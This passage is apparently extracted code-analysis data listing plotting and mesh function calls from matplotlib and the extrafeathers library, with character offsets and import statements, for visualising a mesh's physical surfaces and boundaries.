(['theplot'], {}), '(theplot)\n', (823, 832), True, 'import matplotlib.pyplot as plt\n'), ((833, 861), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Phys. surfaces"""'], {}), "('Phys. surfaces')\n", (843, 861), True, 'import matplotlib.pyplot as plt\n'), ((880, 900), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(4)'], {}), '(2, 2, 4)\n', (891, 900), True, 'import matplotlib.pyplot as plt\n'), ((901, 980), 'extrafeathers.plotmagic.plot_facet_meshfunction', 'plotmagic.plot_facet_meshfunction', (['boundary_parts'], {'invalid_values': '[2 ** 64 - 1]'}), '(boundary_parts, invalid_values=[2 ** 64 - 1])\n', (934, 980), False, 'from extrafeathers import plotmagic\n'), ((979, 997), 'matplotlib.pyplot.axis', 'plt.axis', (['"""scaled"""'], {}), "('scaled')\n", (987, 997), True, 'import matplotlib.pyplot as plt\n'), ((998, 1020), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (1008, 1020), True, 'import matplotlib.pyplot as plt\n'), ((1021, 1051), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Phys. boundaries"""'], {}), "('Phys. boundaries')\n", (1031, 1051), True, 'import matplotlib.pyplot as plt\n'), ((1053, 1078), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Structure"""'], {}), "('Structure')\n", (1065, 1078), True, 'import matplotlib.pyplot as plt\n'), ((1080, 1090), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1088, 1090), True, 'import matplotlib.pyplot as plt\n'), ((212, 230), 'pathlib.Path.cwd', 'pathlib.Path.cwd', ([], {}), '()\n', (228, 230), False, 'import pathlib\n'), ((644, 671), 'extrafeathers.meshfunction.meshsize', 'meshfunction.meshsize', (['mesh'], {}), '(mesh)\n', (665, 671), False, 'from extrafeathers import meshfunction\n')]
|